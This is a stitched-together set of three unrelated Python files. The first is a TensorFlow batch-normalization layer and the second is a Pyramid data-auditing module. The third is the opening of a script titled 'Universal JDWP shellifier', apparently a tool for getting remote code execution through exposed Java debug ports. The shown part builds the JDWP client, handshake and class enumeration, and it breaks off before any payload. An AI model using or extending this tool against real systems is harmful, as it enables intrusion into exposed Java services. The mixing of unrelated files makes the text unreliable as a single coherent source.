from tensorflow.python.ops import variables
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
'').lower() in ('true', 't', '1')
class BatchNormalization(base.Layer):
"""Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Arguments:
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Conv2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: An optional projection function to be applied to the `beta`
weight after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
gamma_constraint: An optional projection function to be applied to the
`gamma` weight after being updated by an `Optimizer`.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_momentum: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `momentum` is still applied
to get the means and variances for inference.
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: A string, the name of the layer.
"""
def __init__(self,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
renorm=False,
renorm_clipping=None,
renorm_momentum=0.99,
fused=None,
trainable=True,
name=None,
**kwargs):
super(BatchNormalization, self).__init__(
name=name, trainable=trainable, **kwargs)
self.axis = axis
self.momentum = momentum
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = beta_initializer
self.gamma_initializer = gamma_initializer
self.moving_mean_initializer = moving_mean_initializer
self.moving_variance_initializer = moving_variance_initializer
self.beta_regularizer = beta_regularizer
self.gamma_regularizer = gamma_regularizer
self.beta_constraint = beta_constraint
self.gamma_constraint = gamma_constraint
self.renorm = renorm
# This environment variable is only used during the testing period of fused
# batch norm and will be removed after that.
if fused is None:
fused = _FUSED_DEFAULT
self.fused = fused
self._bessels_correction_test_only = True
if renorm:
renorm_clipping = renorm_clipping or {}
keys = ['rmax', 'rmin', 'dmax']
if set(renorm_clipping) - set(keys):
raise ValueError('renorm_clipping %s contains keys not in %s' %
(renorm_clipping, keys))
self.renorm_clipping = renorm_clipping
self.renorm_momentum = renorm_momentum
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if not input_shape.ndims:
raise ValueError('Input has undefined rank:', input_shape)
ndim = len(input_shape)
if self.axis < 0:
axis = ndim + self.axis
else:
axis = self.axis
if axis < 0 or axis >= ndim:
raise ValueError('Value of `axis` argument ' + str(self.axis) +
' is out of range for input with rank ' + str(ndim))
if self.fused:
      # Currently fused batch norm doesn't support renorm or beta/gamma
      # regularizers; it only supports an input tensor of rank 4 with the
      # channel dimension on axis 1 or 3.
# TODO(yaozhang): if input is not 4D, reshape it to 4D and reshape the
# output back to its original shape accordingly.
self.fused = not self.renorm and ndim == 4 and axis in [
1, 3
] and self.beta_regularizer is None and self.gamma_regularizer is None
if self.fused:
if axis == 1:
self._data_format = 'NCHW'
else:
self._data_format = 'NHWC'
param_dim = input_shape[axis]
if not param_dim.value:
raise ValueError('Input has undefined `axis` dimension. Input shape: ',
input_shape)
self.input_spec = base.InputSpec(ndim=ndim,
axes={self.axis: param_dim.value})
if self.scale:
self.gamma = self.add_variable(name='gamma',
shape=(param_dim,),
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
trainable=True)
else:
self.gamma = None
if self.fused:
self._gamma_const = array_ops.constant(1.0, shape=(param_dim,))
if self.center:
self.beta = self.add_variable(name='beta',
shape=(param_dim,),
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
trainable=True)
else:
self.beta = None
if self.fused:
self._beta_const = array_ops.constant(0.0, shape=(param_dim,))
# Disable variable partitioning when creating the moving mean and variance
try:
if self._scope:
partitioner = self._scope.partitioner
self._scope.set_partitioner(None)
else:
partitioner = None
self.moving_mean = self.add_variable(
name='moving_mean',
shape=(param_dim,),
initializer=self.moving_mean_initializer,
trainable=False)
self.moving_variance = self.add_variable(
name='moving_variance',
shape=(param_dim,),
initializer=self.moving_variance_initializer,
trainable=False)
if self.renorm:
# Create variables to maintain the moving mean and standard deviation.
# These are used in training and thus are different from the moving
# averages above. The renorm variables are colocated with moving_mean
# and moving_variance.
# NOTE: below, the outer `with device` block causes the current device
# stack to be cleared. The nested ones use a `lambda` to set the desired
# device and ignore any devices that may be set by the custom getter.
def _renorm_variable(name, shape):
var = self.add_variable(name=name,
shape=shape,
initializer=init_ops.zeros_initializer(),
trainable=False)
return var
with ops.device(None):
with ops.device(lambda _: self.moving_mean.device):
self.renorm_mean = _renorm_variable('renorm_mean', (param_dim,))
self.renorm_mean_weight = _renorm_variable('renorm_mean_weight', ())
# We initialize renorm_stddev to 0, and maintain the (0-initialized)
# renorm_stddev_weight. This allows us to (1) mix the average
# stddev with the minibatch stddev early in training, and (2) compute
# the unbiased average stddev by dividing renorm_stddev by the weight.
with ops.device(lambda _: self.moving_variance.device):
self.renorm_stddev = _renorm_variable('renorm_stddev', (param_dim,))
self.renorm_stddev_weight = _renorm_variable(
'renorm_stddev_weight', ())
finally:
if partitioner:
self._scope.set_partitioner(partitioner)
self.built = True
def _fused_batch_norm(self, inputs, training):
"""Returns the output of fused batch norm."""
beta = self.beta if self.center else self._beta_const
gamma = self.gamma if self.scale else self._gamma_const
def _fused_batch_norm_training():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
epsilon=self.epsilon,
data_format=self._data_format)
def _fused_batch_norm_inference():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
mean=self.moving_mean,
variance=self.moving_variance,
epsilon=self.epsilon,
is_training=False,
data_format=self._data_format)
output, mean, variance = utils.smart_cond(
training, _fused_batch_norm_training, _fused_batch_norm_inference)
if not self._bessels_correction_test_only:
# Remove Bessel's correction to be consistent with non-fused batch norm.
# Note that the variance computed by fused batch norm is
# with Bessel's correction.
sample_size = math_ops.cast(
array_ops.size(inputs) / array_ops.size(variance), variance.dtype)
factor = (sample_size - math_ops.cast(1.0, variance.dtype)) / sample_size
variance *= factor
training_value = utils.constant_value(training)
if training_value is not False:
decay = _smart_select(training, lambda: self.momentum, lambda: 1.)
mean_update = moving_averages.assign_moving_average(
self.moving_mean, mean, decay, zero_debias=False)
variance_update = moving_averages.assign_moving_average(
self.moving_variance, variance, decay, zero_debias=False)
self.add_update(mean_update, inputs=inputs)
self.add_update(variance_update, inputs=inputs)
return output
def _renorm_correction_and_moments(self, mean, variance, training):
"""Returns the correction and update values for renorm."""
stddev = math_ops.sqrt(variance + self.epsilon)
# Compute the average mean and standard deviation, as if they were
# initialized with this batch's moments.
mixed_renorm_mean = (self.renorm_mean +
(1. - self.renorm_mean_weight) * mean)
mixed_renorm_stddev = (self.renorm_stddev +
(1. - self.renorm_stddev_weight) * stddev)
# Compute the corrections for batch renorm.
r = stddev / mixed_renorm_stddev
d = (mean - mixed_renorm_mean) / mixed_renorm_stddev
# Ensure the corrections use pre-update moving averages.
with ops.control_dependencies([r, d]):
mean = array_ops.identity(mean)
stddev = array_ops.identity(stddev)
rmin, rmax, dmax = [self.renorm_clipping.get(key)
for key in ['rmin', 'rmax', 'dmax']]
if rmin is not None:
r = math_ops.maximum(r, rmin)
if rmax is not None:
r = math_ops.minimum(r, rmax)
if dmax is not None:
d = math_ops.maximum(d, -dmax)
d = math_ops.minimum(d, dmax)
# When not training, use r=1, d=0, and decay=1 meaning no updates.
r = _smart_select(training, lambda: r, lambda: array_ops.ones_like(r))
d = _smart_select(training, lambda: d, lambda: array_ops.zeros_like(d))
decay = _smart_select(training, lambda: self.renorm_momentum, lambda: 1.)
def _update_renorm_variable(var, weight, value):
"""Updates a moving average and weight, returns the unbiased value."""
# Update the variables without zero debiasing. The debiasing will be
# accomplished by dividing the exponential moving average by the weight.
# For example, after a single update, the moving average would be
      # (1-decay) * value, and the weight will be 1-decay, with their ratio
# giving value.
      # Make sure the weight is not updated until after r and d are computed.
value = array_ops.identity(value)
with ops.control_dependencies([value]):
weight_value = array_ops.constant(1., dtype=weight.dtype)
new_var = moving_averages.assign_moving_average(
var, value, decay, zero_debias=False)
new_weight = moving_averages.assign_moving_average(
weight, weight_value, decay, zero_debias=False)
return new_var / new_weight
with ops.colocate_with(self.moving_mean):
new_mean = _update_renorm_variable(self.renorm_mean,
self.renorm_mean_weight,
mean)
with ops.colocate_with(self.moving_variance):
new_stddev = _update_renorm_variable(self.renorm_stddev,
self.renorm_stddev_weight,
stddev)
# Make sqrt(moving_variance + epsilon) = new_stddev.
new_variance = math_ops.square(new_stddev) - self.epsilon
return (r, d, new_mean, new_variance)
def call(self, inputs, training=False):
if self.fused:
return self._fused_batch_norm(inputs, training=training)
# First, compute the axes along which to reduce the mean / variance,
# as well as the broadcast shape to be used for all parameters.
input_shape = inputs.get_shape()
ndim = len(input_shape)
reduction_axes = list(range(len(input_shape)))
del reduction_axes[self.axis]
broadcast_shape = [1] * len(input_shape)
broadcast_shape[self.axis] = input_shape[self.axis].value
# Determines whether broadcasting is needed.
needs_broadcasting = (sorted(reduction_axes) != list(range(ndim))[:-1])
scale, offset = self.gamma, self.beta
# Determine a boolean value for `training`: could be True, False, or None.
training_value = utils.constant_value(training)
if training_value is not False:
# Some of the computations here are not necessary when training==False
# but not a constant. However, this makes the code simpler.
mean, variance = nn.moments(inputs, reduction_axes)
mean = _smart_select(training,
lambda: mean,
lambda: self.moving_mean)
variance = _smart_select(training,
lambda: variance,
lambda: self.moving_variance)
if self.renorm:
r, d, new_mean, new_variance = self._renorm_correction_and_moments(
mean, variance, training)
# When training, the normalized values (say, x) will be transformed as
# x * gamma + beta without renorm, and (x * r + d) * gamma + beta
# = x * (r * gamma) + (d * gamma + beta) with renorm.
scale = array_ops.stop_gradient(r, name='renorm_r')
offset = array_ops.stop_gradient(d, name='renorm_d')
if self.gamma is not None:
scale *= self.gamma
offset *= self.gamma
if self.beta is not None:
offset += self.beta
else:
new_mean, new_variance = mean, variance
# Update moving averages when training, and prevent updates otherwise.
decay = _smart_select(training, lambda: self.momentum, lambda: 1.)
mean_update = moving_averages.assign_moving_average(
self.moving_mean, new_mean, decay, zero_debias=False)
variance_update = moving_averages.assign_moving_average(
self.moving_variance, new_variance, decay, zero_debias=False)
self.add_update(mean_update, inputs=inputs)
self.add_update(variance_update, inputs=inputs)
else:
mean, variance = self.moving_mean, self.moving_variance
def _broadcast(v):
if needs_broadcasting and v is not None:
# In this case we must explicitly broadcast all parameters.
return array_ops.reshape(v, broadcast_shape)
return v
return nn.batch_normalization(inputs,
_broadcast(mean),
_broadcast(variance),
_broadcast(offset),
_broadcast(scale),
self.epsilon)
def batch_normalization(inputs,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
training=False,
trainable=True,
name=None,
reuse=None,
renorm=False,
renorm_clipping=None,
renorm_momentum=0.99,
fused=None):
"""Functional interface for the batch normalization layer.
Reference: http://arxiv.org/abs/1502.03167
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Note: when training, the moving_mean and moving_variance need to be updated.
By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
need to be added as a dependency to the `train_op`. For example:
```python
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss)
```
Arguments:
inputs: Tensor input.
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Convolution2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: An optional projection function to be applied to the `beta`
weight after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
gamma_constraint: An optional projection function to be applied to the
`gamma` weight after being updated by an `Optimizer`.
training: Either a Python boolean, or a TensorFlow boolean scalar tensor
(e.g. a placeholder). Whether to return the output in training mode
(normalized with statistics of the current batch) or in inference mode
(normalized with moving statistics). **NOTE**: make sure to set this
parameter correctly, or else your training/inference will not work
properly.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: String, the name of the layer.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_momentum: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `momentum` is still applied
to get the means and variances for inference.
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
Returns:
Output tensor.
"""
layer = BatchNormalization(
axis=axis,
momentum=momentum,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
beta_constraint=beta_constraint,
gamma_constraint=gamma_constraint,
renorm=renorm,
renorm_clipping=renorm_clipping,
renorm_momentum=renorm_momentum,
fused=fused,
trainable=trainable,
name=name,
_reuse=reuse,
_scope=name)
return layer.apply(inputs, training=training)
# Aliases
BatchNorm = BatchNormalization
batch_norm = batch_normalization
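# Hedged usage sketch (the tensors `x`, `loss`, the `is_training` flag and the
# optimizer are hypothetical; this mirrors the update_ops pattern documented
# in `batch_normalization` above):
#
#   y = batch_normalization(x, axis=-1, momentum=0.99, training=is_training)
#   update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
#   with tf.control_dependencies(update_ops):
#     train_op = optimizer.minimize(loss)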
# Helper function
def _smart_select(pred, fn_then, fn_else):
"""Selects fn_then() or fn_else() based on the value of pred.
The purpose of this function is the same as `utils.smart_cond`. However, at
the moment there is a bug (b/36297356) that seems to kick in only when
`smart_cond` delegates to `tf.cond`, which sometimes results in the training
hanging when using parameter servers. This function will output the result
of `fn_then` or `fn_else` if `pred` is known at graph construction time.
Otherwise, it will use `tf.where` which will result in some redundant work
(both branches will be computed but only one selected). However, the tensors
involved will usually be small (means and variances in batchnorm), so the
cost will be small and will not be incurred at all if `pred` is a constant.
Args:
pred: A boolean scalar `Tensor`.
fn_then: A callable to use when pred==True.
fn_else: A callable to use when pred==False.
Returns:
A `Tensor` whose value is fn_then() or fn_else() based on the value of pred.
"""
pred_value = utils.constant_value(pred)
if pred_value:
return fn_then()
elif pred_value is False:
return fn_else()
t_then = array_ops.expand_dims(fn_then(), 0)
t_else = array_ops.expand_dims(fn_else(), 0)
pred = array_ops.reshape(pred, [1])
result = array_ops.where(pred, t_then, t_else)
return array_ops.squeeze(result, [0])
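# Hedged behavior note for `_smart_select` (values are illustrative):
#
#   decay = _smart_select(training, lambda: 0.99, lambda: 1.)
#   # `training` known at graph construction -> 0.99 or 1. returned directly
#   # `training` a boolean scalar Tensor     -> both branches are built and
#   #                                           array_ops.where picks one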
|
|
""" Cross-object data auditing
Schema validation allows for checking values within a single object.
We also need to perform higher order checking between linked objects.
"""
import logging
import venusian
from past.builtins import basestring
from pyramid.view import view_config
from .calculated import calculated_property
from .elasticsearch.interfaces import ICachedItem
from .interfaces import (
AUDITOR,
TYPES,
)
from .resources import Item
logger = logging.getLogger(__name__)
logger.setLevel(logging.ERROR)
def includeme(config):
config.include('.calculated')
config.include('.typeinfo')
config.scan(__name__)
config.registry[AUDITOR] = Auditor()
config.add_directive('add_audit_checker', add_audit_checker)
config.add_request_method(audit, 'audit')
# Same as logging
_levelNames = {
0: 'NOTSET',
10: 'DEBUG',
20: 'INFO',
30: 'INTERNAL_ACTION',
40: 'WARNING',
50: 'NOT_COMPLIANT',
60: 'ERROR',
'DEBUG': 10,
'ERROR': 60,
'INFO': 20,
'NOTSET': 0,
'WARNING': 40,
'NOT_COMPLIANT': 50,
'INTERNAL_ACTION': 30,
}
class AuditFailure(Exception):
def __init__(self, category, detail=None, level=0, path=None, name=None):
        super(AuditFailure, self).__init__()
self.category = category
self.detail = detail
if not isinstance(level, int):
level = _levelNames[level]
self.level = level
self.path = path
self.name = name
def __json__(self, request=None):
return {
'category': self.category,
'detail': self.detail,
'level': self.level,
'level_name': _levelNames[self.level],
'path': self.path,
'name': self.name,
}
class Auditor(object):
""" Data audit manager
"""
_order = 0
def __init__(self):
self.type_checkers = {}
def add_audit_checker(self, checker, item_type, condition=None, frame='embedded'):
checkers = self.type_checkers.setdefault(item_type, [])
self._order += 1 # consistent execution ordering
if isinstance(frame, list):
frame = tuple(sorted(frame))
checkers.append((self._order, checker, condition, frame))
def audit(self, request, types, path, **kw):
if isinstance(types, basestring):
types = [types]
checkers = set()
checkers.update(*(self.type_checkers.get(item_type, ()) for item_type in types))
errors = []
system = {
'request': request,
'path': path,
'types': types,
}
system.update(kw)
for order, checker, condition, frame in sorted(checkers):
if frame is None:
uri = path
elif isinstance(frame, basestring):
uri = '%s@@%s' % (path, frame)
else:
uri = '%s@@expand?expand=%s' % (path, '&expand='.join(frame))
value = request.embed(uri)
if condition is not None:
try:
if not condition(value, system):
continue
except Exception as e:
detail = '%s: %r' % (checker.__name__, e)
failure = AuditFailure(
'audit condition error', detail, 'ERROR', path, checker.__name__)
errors.append(failure.__json__(request))
logger.warning('audit condition error auditing %s', path, exc_info=True)
continue
try:
try:
result = checker(value, system)
except AuditFailure as e:
e = e.__json__(request)
if e['path'] is None:
e['path'] = path
e['name'] = checker.__name__
errors.append(e)
continue
if result is None:
continue
if isinstance(result, AuditFailure):
result = [result]
for item in result:
if isinstance(item, AuditFailure):
item = item.__json__(request)
if item['path'] is None:
item['path'] = path
item['name'] = checker.__name__
errors.append(item)
continue
raise ValueError(item)
except Exception as e:
detail = '%s: %r' % (checker.__name__, e)
failure = AuditFailure(
'audit script error', detail, 'ERROR', path, checker.__name__)
errors.append(failure.__json__(request))
logger.warning('audit script error auditing %s', path, exc_info=True)
continue
return errors
# Imperative configuration
def add_audit_checker(config, checker, type_, condition=None, frame='embedded'):
def callback():
types = config.registry[TYPES]
ti = types[type_]
auditor = config.registry[AUDITOR]
auditor.add_audit_checker(checker, ti.name, condition, frame)
config.action(None, callback)
# Declarative configuration
def audit_checker(type_, condition=None, frame='embedded'):
""" Register an audit checker
"""
def decorate(checker):
def callback(scanner, factory_name, factory):
scanner.config.add_audit_checker(
checker, type_, condition, frame)
venusian.attach(checker, callback, category=AUDITOR)
return checker
return decorate
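# Hedged usage sketch (the item type 'Experiment' and the check itself are
# hypothetical; registration happens via the venusian scan in includeme()):
#
#     @audit_checker('Experiment', frame='object')
#     def audit_missing_description(value, system):
#         if not value.get('description'):
#             yield AuditFailure('missing description',
#                                'Item has no description.', level='WARNING')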
def audit(request, types=None, path=None, context=None, **kw):
auditor = request.registry[AUDITOR]
if path is None:
path = request.path
if context is None:
context = request.context
if types is None:
types = [context.type_info.name] + context.type_info.base_types
return auditor.audit(
request=request, types=types, path=path, root=request.root, context=context,
registry=request.registry, **kw)
# Views
def traversed_path_ids(request, obj, path):
if isinstance(path, basestring):
path = path.split('.')
if not path:
yield obj if isinstance(obj, basestring) else obj['@id']
return
name = path[0]
remaining = path[1:]
value = obj.get(name, None)
if value is None:
return
if not isinstance(value, list):
value = [value]
for member in value:
if remaining and isinstance(member, basestring):
member = request.embed(member, '@@object')
for item_uri in traversed_path_ids(request, member, remaining):
yield item_uri
def inherit_audits(request, embedded, embedded_paths):
audit_paths = {embedded['@id']}
for embedded_path in embedded_paths:
audit_paths.update(traversed_path_ids(request, embedded, embedded_path))
audits = {}
for audit_path in audit_paths:
result = request.embed(audit_path, '@@audit-self')
for audit in result['audit']:
if audit['level_name'] in audits:
audits[audit['level_name']].append(audit)
else:
audits[audit['level_name']] = [audit]
return audits
@view_config(context=Item, permission='audit', request_method='GET',
name='audit-self')
def item_view_audit_self(context, request):
path = request.resource_path(context)
types = [context.type_info.name] + context.type_info.base_types
return {
'@id': path,
'audit': request.audit(types=types, path=path),
}
@view_config(context=Item, permission='audit', request_method='GET',
name='audit')
def item_view_audit(context, request):
path = request.resource_path(context)
properties = request.embed(path, '@@object')
    embedded_paths = context.embedded_paths()
    audit_inherit = context.audit_inherit or []
    if embedded_paths and '*' in audit_inherit:
        inherit = embedded_paths
    else:
        inherit = audit_inherit
audit = inherit_audits(request, properties, inherit)
return {
'@id': path,
'audit': audit,
}
def audit_condition(context, request):
# Audits must be explicitly requested if they
# are not available in precached form from elasticsearch
force_audit = request.params.get('audit', False)
if not ICachedItem.providedBy(context) and not force_audit:
return False
# Don't embed audits unless user has permission to see them
if not request.has_permission('audit'):
return False
return True
@calculated_property(context=Item, category='page', name='audit',
condition=audit_condition)
def audit_property(context, request):
path = request.resource_path(context)
return request.embed(path, '@@audit')['audit']
|
|
#!/usr/bin/python
################################################################################
#
# Universal JDWP shellifier
#
# @_hugsy_
#
# And special cheers to @lanjelot
#
import socket
import time
import sys
import struct
import urllib
import argparse
################################################################################
#
# JDWP protocol variables
#
HANDSHAKE = "JDWP-Handshake"
REQUEST_PACKET_TYPE = 0x00
REPLY_PACKET_TYPE = 0x80
# Command signatures
VERSION_SIG = (1, 1)
CLASSESBYSIGNATURE_SIG = (1, 2)
ALLCLASSES_SIG = (1, 3)
ALLTHREADS_SIG = (1, 4)
IDSIZES_SIG = (1, 7)
CREATESTRING_SIG = (1, 11)
SUSPENDVM_SIG = (1, 8)
RESUMEVM_SIG = (1, 9)
SIGNATURE_SIG = (2, 1)
FIELDS_SIG = (2, 4)
METHODS_SIG = (2, 5)
GETVALUES_SIG = (2, 6)
CLASSOBJECT_SIG = (2, 11)
INVOKESTATICMETHOD_SIG = (3, 3)
REFERENCETYPE_SIG = (9, 1)
INVOKEMETHOD_SIG = (9, 6)
STRINGVALUE_SIG = (10, 1)
THREADNAME_SIG = (11, 1)
THREADSUSPEND_SIG = (11, 2)
THREADRESUME_SIG = (11, 3)
THREADSTATUS_SIG = (11, 4)
EVENTSET_SIG = (15, 1)
EVENTCLEAR_SIG = (15, 2)
EVENTCLEARALL_SIG = (15, 3)
# Other codes
MODKIND_COUNT = 1
MODKIND_THREADONLY = 2
MODKIND_CLASSMATCH = 5
MODKIND_LOCATIONONLY = 7
EVENT_BREAKPOINT = 2
SUSPEND_EVENTTHREAD = 1
SUSPEND_ALL = 2
NOT_IMPLEMENTED = 99
VM_DEAD = 112
INVOKE_SINGLE_THREADED = 2
TAG_OBJECT = 76
TAG_STRING = 115
TYPE_CLASS = 1
################################################################################
#
# JDWP client class
#
class JDWPClient:
def __init__(self, host, port=8000):
self.host = host
self.port = port
self.methods = {}
self.fields = {}
self.id = 0x01
return
def create_packet(self, cmdsig, data=""):
flags = 0x00
cmdset, cmd = cmdsig
pktlen = len(data) + 11
pkt = struct.pack(">IIccc", pktlen, self.id, chr(flags), chr(cmdset), chr(cmd))
pkt+= data
self.id += 2
return pkt
def read_reply(self):
header = self.socket.recv(11)
pktlen, id, flags, errcode = struct.unpack(">IIcH", header)
if flags == chr(REPLY_PACKET_TYPE):
if errcode :
raise Exception("Received errcode %d" % errcode)
buf = ""
while len(buf) + 11 < pktlen:
data = self.socket.recv(1024)
if len(data):
buf += data
else:
time.sleep(1)
return buf
def parse_entries(self, buf, formats, explicit=True):
entries = []
index = 0
if explicit:
nb_entries = struct.unpack(">I", buf[:4])[0]
buf = buf[4:]
else:
nb_entries = 1
for i in range(nb_entries):
data = {}
for fmt, name in formats:
if fmt == "L" or fmt == 8:
data[name] = int(struct.unpack(">Q",buf[index:index+8]) [0])
index += 8
elif fmt == "I" or fmt == 4:
data[name] = int(struct.unpack(">I", buf[index:index+4])[0])
index += 4
elif fmt == 'S':
l = struct.unpack(">I", buf[index:index+4])[0]
data[name] = buf[index+4:index+4+l]
index += 4+l
elif fmt == 'C':
data[name] = ord(struct.unpack(">c", buf[index])[0])
index += 1
elif fmt == 'Z':
t = ord(struct.unpack(">c", buf[index])[0])
if t == 115:
s = self.solve_string(buf[index+1:index+9])
data[name] = s
index+=9
elif t == 73:
data[name] = struct.unpack(">I", buf[index+1:index+5])[0]
buf = struct.unpack(">I", buf[index+5:index+9])
index=0
else:
print "Error"
sys.exit(1)
entries.append( data )
return entries
def format(self, fmt, value):
if fmt == "L" or fmt == 8:
return struct.pack(">Q", value)
elif fmt == "I" or fmt == 4:
return struct.pack(">I", value)
raise Exception("Unknown format")
def unformat(self, fmt, value):
if fmt == "L" or fmt == 8:
return struct.unpack(">Q", value[:8])[0]
elif fmt == "I" or fmt == 4:
return struct.unpack(">I", value[:4])[0]
else:
raise Exception("Unknown format")
return
def start(self):
self.handshake(self.host, self.port)
self.idsizes()
self.getversion()
self.allclasses()
return
def handshake(self, host, port):
s = socket.socket()
try:
s.connect( (host, port) )
except socket.error as msg:
raise Exception("Failed to connect: %s" % msg)
s.send( HANDSHAKE )
if s.recv( len(HANDSHAKE) ) != HANDSHAKE:
raise Exception("Failed to handshake")
else:
self.socket = s
return
def leave(self):
self.socket.close()
return
def getversion(self):
self.socket.sendall( self.create_packet(VERSION_SIG) )
buf = self.read_reply()
formats = [ ('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"),
('S', "vmVersion"), ('S', "vmName"), ]
for entry in self.parse_entries(buf, formats, False):
for name,value in entry.iteritems():
setattr(self, name, value)
return
@property
def version(self):
return "%s - %s" % (self.vmName, self.vmVersion)
def idsizes(self):
self.socket.sendall( self.create_packet(IDSIZES_SIG) )
buf = self.read_reply()
formats = [ ("I", "fieldIDSize"), ("I", "methodIDSize"), ("I", "objectIDSize"),
("I", "referenceTypeIDSize"), ("I", "frameIDSize") ]
for entry in self.parse_entries(buf, formats, False):
for name,value in entry.iteritems():
setattr(self, name, value)
return
def allthreads(self):
try:
getattr(self, "threads")
except :
self.socket.sendall( self.create_packet(ALLTHREADS_SIG) )
buf = self.read_reply()
formats = [ (self.objectIDSize, "threadId")]
self.threads = self.parse_entries(buf, formats)
finally:
return self.threads
def get_thread_by_name(self, name):
self.allthreads()
for t in self.threads:
threadId = self.format(self.objectIDSize, t["threadId"])
self.socket.sendall( self.create_packet(THREADNAME_SIG, data=threadId) )
buf = self.read_reply()
if len(buf) and name == self.readstring(buf):
return t
return None
def allclasses(self):
try:
getattr(self, "classes")
except:
self.socket.sendall( self.create_packet(ALLCLASSES_SIG) )
buf = self.read_reply()
formats = [ ('C', "refTypeTag"),
(self.referenceTypeIDSize, "refTypeId"),
('S', "signature"),
('I', "status")]
self.classes = self.parse_entries(buf, formats)
return self.classes
def get_class_by_name(self, name):
for entry in self.classes:
if entry["signature"].lower() == name.lower() :
return entry
return None
def get_methods(self, refTypeId):
if not self.methods.has_key(refTypeId):
refId = self.format(self.referenceTypeIDSize, refTypeId)
self.socket.sendall( self.create_packet(METHODS_SIG, data=refId) )
buf = self.read_reply()
formats = [ (self.methodIDSize, "methodId"),
('S', "name"),
('S', "signature"),
('I', "modBits")]
self.methods[refTypeId] = self.parse_entries(buf, formats)
return self.methods[refTypeId]
def get_method_by_name(self, name):
